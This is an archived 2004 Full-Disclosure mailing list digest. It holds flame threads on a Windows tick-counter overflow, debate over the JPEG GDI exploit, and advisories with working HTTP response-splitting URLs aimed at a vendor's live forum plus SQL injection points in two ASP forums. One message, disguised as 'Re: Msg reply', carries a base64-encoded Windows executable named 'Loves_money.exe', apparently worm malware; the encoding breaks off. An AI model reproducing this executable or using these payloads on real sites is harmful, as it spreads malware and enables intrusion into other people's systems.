Full Disclosure mailing list archives
[Full-Disclosure] Re: Full-disclosure digest, Vol 1 #1933 - 20 msgs
From: "milw0rm Inc." <milw0rm () gmail com>
Date: Mon, 27 Sep 2004 13:12:10 -0500
JPEG GDI problem, Isn't this problem only capable of running if the jpeg was opened via the users actions? Is it possible that webpages could be effected with jpegs with internet explorer viewing them? I wouldn't think so since what I have read from multiple peoples articles that it isn't this kind of bug. Info needed. Regards, str0ke On Mon, 27 Sep 2004 12:00:05 -0400, full-disclosure-request () lists netsys com <full-disclosure-request () lists netsys com> wrote:
Send Full-Disclosure mailing list submissions to full-disclosure () lists netsys com To subscribe or unsubscribe via the World Wide Web, visit http://lists.netsys.com/mailman/listinfo/full-disclosure or, via email, send a message with subject or body 'help' to full-disclosure-request () lists netsys com You can reach the person managing the list at full-disclosure-admin () lists netsys com When replying, please edit your Subject line so it is more specific than "Re: Contents of Full-Disclosure digest..." Today's Topics: 1. RE: [inbox] Re: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11 (Exibar) 2. RE: [inbox] Re: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11 (Ron DuFresne) 3. RE: Full-Disclosure: JEPG Hype or Hope? (RandallM) 4. SANS GDIscan (bashis) 5. HTTP Response Splitting and SQL injection in megabbs forum (pigrelax) 6. SQL injection in BroadBoard Instant ASP Message Board (pigrelax) 7. Re: HTTP Response Splitting and SQL injection in megabbs forum (PD9 Software) 8. Re: Re: HTTP Response Splitting and SQL injection in megabbs forum (DanB UK) 9. RE: Windoze almost managed to 200x repeat 9/11 (joe) 10. Re: Windoze almost managed to 200x repeat 9/11 (Barry Fitzgerald) 11. Re: Windoze almost managed to 200x repeat 9/11 (Vince Able) 12. Re: Windoze almost managed to 200x repeat 9/11 (ASB) 13. RE: Full-Disclosure: JEPG Hype or Hope? (r00t3d) 14. Re: Msg reply (Elvi) 15. [ GLSA 200409-34 ] X.org, XFree86: Integer and stack overflows in libXpm (Thierry Carrez) 16. [gentoo-announce] [ GLSA 200409-34 ] X.org, XFree86: Integer and stack overflows in libXpm (Thierry Carrez) 17. [SECURITY] [DSA 553-1] New getmail packages fix root compromise (debian-security-announce () lists debian org) --__--__-- Message: 1 From: "Exibar" <exibar () thelair com> To: "ASB" <abaker () gmail com>, <full-disclosure () lists netsys com> Subject: RE: [inbox] Re: [Full-disclosure] Windoze almost managed to 200x repeat 9/11 Date: Sun, 26 Sep 2004 12:15:26 -0400 Exactly. Some idiot decided to program the entire system to shut down after 49 days. What an idiot, why not just setup a maintenance program to perform a scheduled re-boot of the system instead of having an automated proecess shut down the system and then have to schedule a work around for this by scheduling a manual boot every 30 days (which someone forgot). This whole thing wasn't Windows' fault, but an idiot programmer/manager/whatever fault. Exibar-----Original Message----- From: ASB [mailto:abaker () gmail com] Sent: Sunday, September 26, 2004 10:56 AM To: full-disclosure () lists netsys com Subject: [inbox] Re: [Full-disclosure] Windoze almost managed to 200x repeat 9/11 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Next time, please read the thread in context. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The context of the thread is that an application issue is being incorrectly interpreted as an OS issue. -ASB On Fri, 24 Sep 2004 14:43:53 -0400, Barry Fitzgerald <bkfsec () sdf lonestar org> wrote:ASB wrote:~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Where issues like this relate to the OS is in the fact that the OS itself shouldn't be brought down by a poorly designed app. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ And where in that article did you read that the OS was brought down by a poorly designed app?I didn't... I was reponding to a point that was made about applications being reponsible for system failures.~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Was it MS Windows that actually held the code that broughtthe system down?~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The article was pretty clear: <snip> How you managed to read "OS failure" into this is rather astounding...How you manage to get up in the morning is rather astounding. Next time, please read the thread in context. Also, if you think that that's a detailed assessment of the problem, you're not too bright. So try and think a little harder next time, and not be so abbrassive. You may be having a bad day (most likely due to your poor attitude) but don't take your own misunderstanding out on others, mmkay? -Barry_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html--__--__-- Message: 2 Date: Sun, 26 Sep 2004 11:48:22 -0500 (CDT) From: Ron DuFresne <dufresne () winternet com> To: Exibar <exibar () thelair com> cc: ASB <abaker () gmail com>, <full-disclosure () lists netsys com> Subject: RE: [inbox] Re: [Full-disclosure] Windoze almost managed to 200x repeat 9/11 On Sun, 26 Sep 2004, Exibar wrote:Exactly. Some idiot decided to program the entire system to shut down after 49 days. What an idiot, why not just setup a maintenance program to perform a scheduled re-boot of the system instead of having an automated proecess shut down the system and then have to schedule a work around for this by scheduling a manual boot every 30 days (which someone forgot).Which, likely in this case, would have to somehow be monitored, seems to be a pretty critical application, one in which lives are dependant, and it is entirely possible the system might not recover from a reboot. Thanks, Ron DuFresne -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. --__--__-- Message: 3 From: "RandallM" <randallm () fidmail com> To: <full-disclosure () lists netsys com> Date: Sun, 26 Sep 2004 12:02:20 -0500 Subject: [Full-Disclosure] RE: Full-disclosure: JEPG Hype or Hope? What exactly would one gain by creating a PoC on this exploit? How exactly does this compare to meaningful disclosures that were revealed because someone would not listen or ignored the warnings of their security vulnerability. I mean, this is nothing like a program goof that allows clear-text Passwords or exposes files or the like. This exploit (if it can be called that) took a lot of thought to create it and exploit it. Correct me if I'm wrong but it does not fall in to the category of "exploit" as defined by this list. This was truly a "created Exploit" that would not be their otherwise. This took intelligent input. This is nothing more then a black-hat attack. It is not a meaningful revealing of poor security as I've seen defined on this list. <|>-- __--__-- <|> <|>Message: 13 <|>From: "i.t " <fulldis () it97 dyndns org> <|>Organization: i.t consulting <|>To: full-disclosure () lists netsys com <|>Date: Sun, 26 Sep 2004 11:57:33 +0200 <|>Subject: [Full-disclosure] Re: MS04-028 Jpeg EXPLOIT - msn <|> <|> <|>> On Saturday 25 September 2004 16:59, raza wrote: <|>> > I just compiled this and it works well.. <|>> > <|> ... <|>> yes and it works very well. <|>> > I can see this ones gaana be fun... <|>> We'll have a worm within days. <|> <|>for nearly all of my clients using win xp I've deinstalled <|>win messenger. <|>one urgently wanted it back for communicating in real-time; <|>and, of course, <|>it's much more fun seeing a live picture of the <|>counterpart(s) in the chat <|>window... <|> <|>even having installed sp2 and the newest patches plus AV I <|>can imagine a virus <|>spreading within those pictures throughout the whole msn and so on... <|>any other defense? <|>or ist this too much paranoia? <|> <|>i.t <|> <|> <|>-- __--__-- --__--__-- Message: 4 To: full-disclosure () lists netsys com Date: Sun, 26 Sep 2004 17:34:04 +0200 (CEST) From: bashis <mcw () wcd se> Reply-To: mcw () wcd se Subject: [Full-disclosure] SANS GDIscan Hi I tested [1] 'gdiscan' from SANS, and this tool reports vulnerable DLL's after installing all availible patches from M$.. WinXP Pro SP1 C:\WINDOWS\system32\gdiplus.dll Version: 5.1.3097.0 <-- Vulnerable version Win2k Server SP4 C:\Program Files\Common Files\Microsoft Shared\Ink\gdiplus.dll Version: 5.1.3097.0 <-- Vulnerable version [1] http://isc.sans.org/gdiscan.php Have a nice day /bashis --__--__-- Message: 5 From: "pigrelax" <pigrelax () yandex ru> To: <full-disclosure () lists netsys com> Cc: <bugtraq () Securityfocus com>, <info () pd9soft com> Date: Sun, 26 Sep 2004 21:56:44 +0400 Subject: [Full-disclosure] HTTP Response Splitting and SQL injection in megabbs forum URL: http://www.pd9soft.com Tested megabbs 2.1 1. HTTP Response Splitting http://www.pd9soft.com/megabbs/forums/thread-post.asp?action=writenew&fid=%0 d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20 text/html%0d%0aContent-Length:%2033%0d%0a%0d%0a%3chtml%3eScanned%20by%20Maxp atrol%3c/html%3e%0d%0a&tid=4924&replyto=22947&displaytype=flat Result: <...> HTTP/1.1 302 Object moved Connection: close Date: Sun, 26 Sep 2004 14:14:02 GMT Server: Microsoft-IIS/6.0 Location: /megabbs/forums/forum-view.asp?fid= Content-Length: 0 HTTP/1.0 200 OK Content-Type: text/html Content-Length: 33 <html>Scanned by Maxpatrol</html> Content-Length: 290 Content-Type: text/html Expires: Sun, 26 Sep 2004 14:13:02 GMT Set-Cookie: guestID=309; path=/ Set-Cookie: ASPSESSIONIDAQRTADCB=KNEIJIEDEMJPNNKPNFONOIFL; path=/ Cache-contro <...> 2. HTTP Response Splitting http://www.pd9soft.com/megabbs/forums/thread-post.asp?fid=%0d%0aContent-Leng th:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aC ontent-Length:%2033%0d%0a%0d%0a%3chtml%3eScanned%20by%20Maxpatrol%3c/html%3e %0d%0a&action=writenew&displaytype=flat Result: <...> HTTP/1.1 302 Object moved Connection: close Date: Sun, 26 Sep 2004 14:34:05 GMT Server: Microsoft-IIS/6.0 Location: /megabbs/forums/forum-view.asp?fid= Content-Length: 0 HTTP/1.0 200 OK Content-Type: text/html Content-Length: 33 <html>Scanned by Maxpatrol</html> Content-Length: 290 Content-Type: text/html Expires: Sun, 26 Sep 2004 14:33:05 GMT Set-Cookie: guestID=421; path=/ Set-Cookie: ASPSESSIONIDAQRTADCB=HCGIJIEDMBPIHPCDJFKACJAC; path=/ Cache-contro <...> 3. More and more SQL injection: ladder-log.asp?categoryid=1&sortby=completeddate&sortdir=1' ladder-log.asp?categoryid=1&filter=id&criteria=1' view-profile.asp?type=single&memberid=1' view-profile.asp?type=team&teamid=1' MaxPatrol is a professional network security scanner distinguished by its uncompromisingly high quality of scanning, optimized for effective use by companies of any size (serving from a few to tens of thousands of nodes). MaxPatrol developers were able quite simply to "ignore" about 40% of the newly published vulnerabilities because their product's intelligent algorithms had already detected them. http://www.Maxpatrol.com --__--__-- Message: 6 From: "pigrelax" <pigrelax () yandex ru> To: <full-disclosure () lists netsys com> Cc: <bugtraq () Securityfocus com> Date: Mon, 27 Sep 2004 00:09:32 +0400 Subject: [Full-disclosure] SQL injection in BroadBoard Instant ASP Message Board BroadBoard Instant ASP Message Board URL: http://www.broadboard.com/ 1. software does not properly validate user-supplied input in the 'keywords' parameter in search.asp: http://broadboard/forum/search.asp?archives=1&action=1&keywords=['SQL code]&method=1&method=1&body=1&subject=1&board=1&results=1 2. software does not properly validate user-supplied input in the 'handle' parameter in profile.asp: http://broadboard/forum/profile.asp?handle=['SQL code] 3. software does not properly validate user-supplied input in the 'txtUserHandle' parameter in reg2.asp: POST /forum/reg2.asp HTTP/1.1 Host: broadboard Content-Type: application/x-www-form-urlencoded Content-Length: 121 txtNameFirst=1&txtNameLast=1&txtUserEmail=sales () maxpatrol com&txtUserHandle= ['SQL code]&txtUserPwd=1&txtUserCPwd=1&cmdRegister=1 4. software does not properly validate user-supplied input in the 'txtUserEmail' parameter in forgot.asp: POST /forum/forgot.asp HTTP/1.1 Host: broadboard Content-Type: application/x-www-form-urlencoded Content-Length: 24 txtUserEmail=['SQL code]&cmdSend=1 MaxPatrol is a professional network security scanner distinguished by its uncompromisingly high quality of scanning, optimized for effective use by companies of any size (serving from a few to tens of thousands of nodes). MaxPatrol developers were able quite simply to "ignore" about 40% of the newly published vulnerabilities because their product's intelligent algorithms had already detected them. http://www.Maxpatrol.com --__--__-- Message: 7 Date: Sun, 26 Sep 2004 13:50:50 -0500 From: PD9 Software <info () pd9soft com> CC: full-disclosure () lists netsys com, bugtraq () Securityfocus com Subject: [Full-disclosure] Re: HTTP Response Splitting and SQL injection in megabbs forum pigrelax wrote:URL: http://www.pd9soft.com Tested megabbs 2.1 1. HTTP Response Splitting 2. HTTP Response Splitting 3. More and more SQL injection:All three issues have been addressed, and updates have been posted at http://www.pd9soft.com/. Thank you for bringing them to my attention. However in the future, would it be too much to ask that I am contacted first? I am very eager to fix any security vulnerabilities, but sipping coffee on a lazy Sunday afternoon and seeing this broadcast to a public list is a little disconcerting. Thanks, Matt Summers PD9 Software, Inc --__--__-- Message: 8 Date: Sun, 26 Sep 2004 23:12:42 +0100 From: DanB UK <danbuk () gmail com> Reply-To: DanB UK <danbuk () gmail com> To: full-disclosure () lists netsys com Subject: Re: [Full-disclosure] Re: HTTP Response Splitting and SQL injection in megabbs forum It seems like the OP was actually just trying to advertise their(or affiliates) product. I would say that its not the 'done' thing.However in the future, would it be too much to ask that I am contacted first? I am very eager to fix any security vulnerabilities, but sipping coffee on a lazy Sunday afternoon and seeing this broadcast to a public list is a little disconcerting.I understand your concern. Regards, Daniel -- DanB UK London, UK --__--__-- Message: 9 From: "joe" <mvp () joeware net> To: "'devis'" <devis () easynix net> Cc: <full-disclosure () lists netsys com> Subject: RE: [Full-disclosure] Windoze almost managed to 200x repeat 9/11 Date: Sun, 26 Sep 2004 18:42:29 -0400 I get paid nothing to hang out on this list. In fact many of my friends feel I am wasting considerable time here because the vast majority of the people are Linux bigots simply holding each others', ummm, hands. Once in a while though some seriously good information or conversation occurs here which is why I like to hang out and most of my responses tend to be offlist. Occasionally I like to dampen some of the occasional this or that about how bad Windows sucks from people who don't know enough about how it works to even have a very good opinion. They are intelligent people mostly, they just have a hamster up their bum about billg or MS for some reason. It is funny to me how this thread came onto the list as a "Windows sucks" thread when it should have been a serious, "some programmers don't understand data types sucks" thread. It is poor programming habits like this that cause a great deal of the flaws in apps and OSes that others take advantage of. Programmers need to understand the proper way to handle the datatypes they use in their applications, whether it be checking for data size constraints or data range constraints. As for missing out on cash or something from MS, I am not so sure MS would have me as an employee at the moment as I spend considerable time banging on them and their OS and choices. I don't do it out in the public lists like this as I am trying to be a rightous d00d to all of you cool people. I bang on them in the private groups that have MS people seriously looking to make things better. For this specific thread, my main point is that someone who can't figure out that an unsigned integer value that is incrementing will roll at some point is a dangerous programmer no matter what OS they are on. This has nothing to do with Windows or any OS. It is how computers work period. There isn't a single OS out there that you could constantly increment a 32 bit unsigned counter and not roll to zero. This is way below anything the OS can control. At best it halts the program as soon as the overflow kicks. That really wouldn't help much except possibly with data corruption. I don't think an OS should protecting apps from data corruption due to the app losing count though. joe -----Original Message----- From: full-disclosure-admin () lists netsys com [mailto:full-disclosure-admin () lists netsys com] On Behalf Of devis Sent: Saturday, September 25, 2004 12:49 PM Cc: full-disclosure () lists netsys com Subject: Re: [Full-disclosure] Windoze almost managed to 200x repeat 9/11 Joe dude, how much u are getting from M$ a month to hang around this list ? Zero ? Noway....send em a letter now dude. And please don't serve me, 'just being objective crap', you HAVE to be interested to defend it that well., if not, well, you may be missing on something... joe wrote:Definitely some interesting theories Ron.1> the code was better done under the original OS, unixWhile possible, nothing actually points at this as being the case. Anyway, I would be curious as to the functionality of the system when it was first launched on UNIX versus the end-result. Put this on Windows and run it 10 years and then port to UNIX or *nix and there will almost certainly be screwups there as well. In fact, I would be pretty confident. I have dealt with poor ports to and from Windows and *nix. I have even dealt with bad ports from Mainframes to UNIX where the whole time the Mainframe people were saying the same types of things about UNIX that you like to say about Windows. Being a good coder for one OS doesn't make you one for all Oses when dealing with systemlevel components and interfaces.2> considering "how often" you seems to run into this same issue with other coders in the windows realm, windows coders tend to be especially lazy/clueless as compared to coders in other OS'I would expect the issue is the same as always. Sheer volume. There are good and bad coders period. Microsoft has surely drawn more poor coders than any other OS with its pushing of the RAD/simple coding environmentsuch as VB.Additionally the Windows environment as a whole has more inexperienced users and admins and people likely to try and code. There are also many good ones as well, they are just well buried in the poor ones.3> tools to code with in the windows realm are not as 3> developed/functional as they are in other envsI would say this opinion is uninformed.4> M$ does not properly provide developers with clued information with which to do their jobsThis is another opinion which I would call rather uninformed. Even if there was poor function documentation, if you have a function, any function returning a constantly increasing counter you know, as a skilled programmer, that eventually it has to do something other than increase. If the value is signed the sign bit will flip or if it is unsigned it will roll to 0. How can a good programmer think any other thing? The compiler could have inserted exception handling code but at best that is simply going to bounce the program out of a normal running state. That is a compiler thing though, not an OS thing. I do hope you aren't trying to tell me that UNIX can magically and infinitely maintain a counter on a variable with a fixed bit size. I try to consideryou to be a bit more intelligent than that.To put it in anotehr way, if you have a set of tires on a car that are rated for 75 MPH (say off road truck tires) and some person goes 90 and the tires fly apart or the vehicle flips or both, is the issue the driver, the vehicle manufacturer, the tire manufacturer, or the tree that produced the rubber for the tire? This is the same sort of case. You have it in your mind ahead of time who you want to be at fault because you have a bug up your bum about it and work to prove that stance. Poor coding is a result of poor coders. I have seen amazingly bad code on all OS/RTS platforms I have worked on from RSTS to BSD to Linux to Windows to DOS to VMS. I have also seen some amazingly good stuff on the same platforms. Someone who doesn't understand basic data types and how to handle their limits is going to do a shitty job on all of theplatforms.Is the ratio of good admins to bad admins better in UNIX versus Windows? Absolutely. Is the ratio of good programmers to bad programmers better in UNIX versus Windows? Most certainly. Does this mean all Windows admins are bad admins, obviously not. Does this mean all Windows programmers are bad programmers, obviously not. I specifically say UNIX versus *nix because I think *nix is one or more steps closer to Windows in this discussion and getting closer as its popularity grows with Windows users. Switching to *nix doesn't make the admins or coders switching (or just using in tandem) any better simply because theyswitched.-----Original Message----- From: Ron DuFresne [mailto:dufresne () winternet com] Sent: Friday, September 24, 2004 11:25 PM To: joe Cc: mcw () wcd se; full-disclosure () lists netsys com Subject: RE: [Full-disclosure] Windoze almost managed to 200x repeat 9/11 On Fri, 24 Sep 2004, joe wrote:Again, there are valid uses of GetTickCount and there are safe ways of doing so. If there is concern, I do recommend testing functionality associated with each of the DLLs. You might find a bug you can report forkudos.On the incident, I would guess the vendor never had a clue it would dothat.That function can't return more than 49.7 days without breaking every app that currently uses it. MS can not do that. That is why there is another function to get the info with a different datatype. See my otherposts. What seems to read clearly from your replies to this thread is that either; 1> the code was better done under the original OS, unix 2> considering "how often" you seems to run into this same issue with other coders in the windows realm, windows coders tend to be especially lazy/clueless as compared to coders in other OS' 3> tools to code with in the windows realm are not as 3> developed/functional as they are in other envs 4> M$ does not properly provide developers with clued information with which to do their jobsFrom which you can combine any or all of the above for a correctinterpretation of the total of your replies. Thanks, Ron DuFresne -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html --__--__-- Message: 10 Date: Sun, 26 Sep 2004 20:41:34 -0400 From: Barry Fitzgerald <bkfsec () sdf lonestar org> To: ASB <abaker () gmail com> CC: full-disclosure () lists netsys com Subject: Re: [Full-disclosure] Windoze almost managed to 200x repeat 9/11 ASB wrote:~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Next time, please read the thread in context. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The context of the thread is that an application issue is being incorrectly interpreted as an OS issue.Oversimplification is for the foolish. Like I said, you're not too bright. You're showing very little understanding of system architecture here. My point regarding where the code was located had to do with a generalized statement regarding applications being at fault for issues and for them not being OS issues. My point was that it's not always clear cut. I was not trying to say that this case was an OS issue. I was trying to say that the line is not always black and white. I was also pointing out that none of us know because the only information we have to go on is third-hand and imprecise. If you can predict conditions based on imprecise third-hand information, then what are you doing here?!? Go solve the world's problems or something. of course, you can't so you've decided to just flame people. Please re-read my posts and think before you respond. If, besides misreading my posts, you can find no argument with what I've said (which, you won't, because I'm right) then I'm willing to hear them. Other than that, you're just wasting everyone's time by trying to railroad points that you don't understand. -Barry --__--__-- Message: 11 From: "Vince Able" <we_hate_vince () hotmail com> To: <full-disclosure () lists netsys com> Subject: Re: [Full-disclosure] Windoze almost managed to 200x repeat 9/11 Date: Sun, 26 Sep 2004 21:24:27 -0400 Organization: The Ram Group Well what a nice first post to read entering Full-Disclosure. LoL ----- Original Message ----- From: "Barry Fitzgerald" <bkfsec () sdf lonestar org> To: "ASB" <abaker () gmail com> Cc: <full-disclosure () lists netsys com> Sent: Sunday, September 26, 2004 8:41 PM Subject: Re: [Full-disclosure] Windoze almost managed to 200x repeat 9/11ASB wrote:~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Next time, please read the thread in context. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The context of the thread is that an application issue is being incorrectly interpreted as an OS issue.Oversimplification is for the foolish. Like I said, you're not toobright.You're showing very little understanding of system architecture here. My point regarding where the code was located had to do with a generalized statement regarding applications being at fault for issues and for them not being OS issues. My point was that it's not always clear cut. I was not trying to say that this case was an OS issue. I was trying to say that the line is not always black and white. I was also pointing out that none of us know because the only information we have to go on is third-hand and imprecise. If you can predict conditions based on imprecise third-hand information, then what are you doing here?!? Go solve the world's problems or something. of course, you can't so you've decided to just flame people. Please re-read my posts and think before you respond. If, besides misreading my posts, you can find no argument with what I've said (which, you won't, because I'm right) then I'm willing to hear them. Other than that, you're just wasting everyone's time by trying to railroad points that you don't understand. -Barry _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html--__--__-- Message: 12 Date: Sun, 26 Sep 2004 22:36:12 -0400 From: ASB <abaker () gmail com> Reply-To: ASB <abaker () gmail com> To: full-disclosure () lists netsys com Subject: Re: [Full-disclosure] Windoze almost managed to 200x repeat 9/11 There was more than enough information provided in the initial link, besides what was available to those who took a moment or 3 to search for additional info, to avoid coming to the conclusion that the OS was the fault here. The mere fact that thousands, if not millions of people manage to run Windows 2000 systems which do not keel over every 49.7 days, would tend to cause one to look elsewhere for the source of the issue. Beyond that, the wording of the various articles on this issue that I looked at, made it rather obvious that there was an issue with the APPLICATION which rendered it useless if certain operator steps were not performed. No matter how scanty you feel the articles were, they never even implied that the OS was inoperable during any of this. While it is certainly important to have as much information as possible before rendering verdicts of any sort, and while not every issue can be definitively outlined as jet black or lily white, there's not a whole lot more forensics that's needed to conclude that the root of the issue is one of application development, compounded by the failure of an operator to perform a prescribed workaround at the appointed time. The irony here is that you're accusing me of not reading or comprehending. -ASB On Sun, 26 Sep 2004 20:41:34 -0400, Barry Fitzgerald <bkfsec () sdf lonestar org> wrote:ASB wrote:~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Next time, please read the thread in context. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The context of the thread is that an application issue is being incorrectly interpreted as an OS issue.Oversimplification is for the foolish. Like I said, you're not too bright. You're showing very little understanding of system architecture here. My point regarding where the code was located had to do with a generalized statement regarding applications being at fault for issues and for them not being OS issues. My point was that it's not always clear cut. I was not trying to say that this case was an OS issue. I was trying to say that the line is not always black and white. I was also pointing out that none of us know because the only information we have to go on is third-hand and imprecise. If you can predict conditions based on imprecise third-hand information, then what are you doing here?!? Go solve the world's problems or something. of course, you can't so you've decided to just flame people. Please re-read my posts and think before you respond. If, besides misreading my posts, you can find no argument with what I've said (which, you won't, because I'm right) then I'm willing to hear them. Other than that, you're just wasting everyone's time by trying to railroad points that you don't understand. -Barry--__--__-- Message: 13 Date: Sun, 26 Sep 2004 22:20:29 -0700 From: r00t3d <r00t3d () gmail com> Reply-To: r00t3d <r00t3d () gmail com> To: randallm () fidmail com, full-disclosure () lists netsys com Subject: [Full-Disclosure] RE: Full-disclosure: JEPG Hype or Hope? Dear RandallM,This exploit (if it can becalled that) took a lot of thought tocreate it and exploit it. Yea, lots of thought, and ripped shellcode to boot! Can't beat that can ya?Correct me if I'm wrong but it does not fall in to the category of "exploit" as defined by this list.Okay, you're wrong.This was truly a "created Exploit"Seriously? I didn't know exploits were "created" I always thought they just appeared.This is nothing more then a black-hat attack. It is not a meaningful revealing of poor security as I've seen defined on this list.Uh oh, are the blaqhats after us again?? I think we had all better just pull our whitehats down over our heads and hope they go away. I hear, if you don't move, the blaqhats won't notice you and will leave, kind of like with bears. Anyways, last time I checked, it was't blaqhats that disclosed exploits, it was whitehats and scene whores. Love, #MSNetworks --__--__-- Message: 14 Date: Mon, 27 Sep 2004 09:03:35 +0200 To: "Full-disclosure" <full-disclosure () lists netsys com> From: "Elvi" <elvi52001 () yahoo com> Subject: [Full-disclosure] Re: Msg reply ----------tthzhwewredcturxosqp Content-Type: text/html; charset="us-ascii" Content-Transfer-Encoding: 7bit <html><body> <br> </body></html> ----------tthzhwewredcturxosqp Content-Type: application/octet-stream; name="Loves_money.exe" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="Loves_money.exe" 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 